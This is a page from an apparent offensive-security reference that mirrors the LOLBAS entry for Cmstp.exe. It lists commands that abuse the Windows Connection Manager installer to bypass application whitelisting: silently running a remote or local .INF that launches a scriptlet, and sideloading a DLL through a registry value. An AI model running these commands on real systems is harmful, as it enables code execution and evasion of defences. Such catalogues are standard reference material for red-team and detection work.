🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
πŸͺŸ LOLBAS / Cmstp.exe

Cmstp.exe

Installs or removes a Connection Manager service profile.

AWL Bypass

Execute code hidden within an inf file. Execute code directly from Internet.

cmstp.exe /ni /s {REMOTEURL:.inf}

Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. — MITRE: T1218.003 — Privileges: User

Execute

Execute code hidden within an inf file. Download and run scriptlets from internet.

cmstp.exe /ni /s {PATH_ABSOLUTE:.inf}

Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. — MITRE: T1218.003 — Privileges: User

Proxy execution of a malicious DLL via registry modification.

cmstp.exe /nf

cmstp.exe reads the `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\cmmgr32.exe\CmstpExtensionDll` registry value and passes its data directly to `LoadLibrary`. By modifying this registry key and setting it to an attack-controlled DLL, this will sideload the DLL via `cmstp.exe`. — MITRE: T1218.003 — Privileges: Administrator